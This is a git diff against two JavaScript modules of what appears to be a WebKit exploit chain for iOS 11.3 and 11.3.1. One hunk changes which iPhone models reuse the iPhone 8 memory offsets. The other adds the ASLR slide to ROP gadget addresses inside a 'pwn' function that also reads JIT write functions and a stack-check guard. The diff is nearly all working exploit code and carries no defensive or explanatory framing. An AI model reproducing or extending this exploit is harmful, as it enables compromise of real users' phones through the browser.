diff --git a/modules/offsets.module.js b/modules/offsets.module.js index 90ab30f..ace17e3 100644 --- a/modules/offsets.module.js +++ b/modules/offsets.module.js @@ -75,8 +75,8 @@ var Offsets = function Offsets(sw_vers, productname) { }; offsets["iPhone 8"][11.3] = offsets["iPhone 8"][11.31]; - //offsets["iPhone 8+"][11.3] = offsets["iPhone 8"][11.31]; - offsets["iPhone X"][11.3] = offsets["iPhone 8"][11.31]; + offsets["iPhone 8+"][11.3] = offsets["iPhone 8"][11.31]; + //offsets["iPhone X"][11.3] = offsets["iPhone 8"][11.31]; offsets["iPhone 8+"][11.31] = offsets["iPhone 8"][11.31]; //offsets["iPhone X"][11.31] = offsets["iPhone 8"][11.31]; diff --git a/modules/sploit.1131.module.js b/modules/sploit.1131.module.js index 68b47e6..cff0bad 100644 --- a/modules/sploit.1131.module.js +++ b/modules/sploit.1131.module.js @@ -266,9 +266,9 @@ var pwn = function() { jitWriteSeparateHeapsFunction = stage2.read64(_off.jit_writeseperateheaps_func + slide) useFastPermisionsJITCopy = stage2.read64(_off.usefastpermissions_jitcopy + slide) ptr_stack_check_guard = _off.ptr_stack_check_guard + slide; - pop_x8 = _off.modelio_popx8; - pop_x2 = _off.coreaudio_popx2; - linkcode_gadget = _off.linkcode_gadget; + pop_x8 = _off.modelio_popx8 + slide; + pop_x2 = _off.coreaudio_popx2 + slide; + linkcode_gadget = _off.linkcode_gadget + slide; if(verbosity >= VERBOSITY_HIGH) { print('disablePrimitiveGigacage @ ' + hex(disablePrimitiveGigacage) @@ -369,4 +369,4 @@ var wk113go = function() { } }); }); -}; \ No newline at end of file +};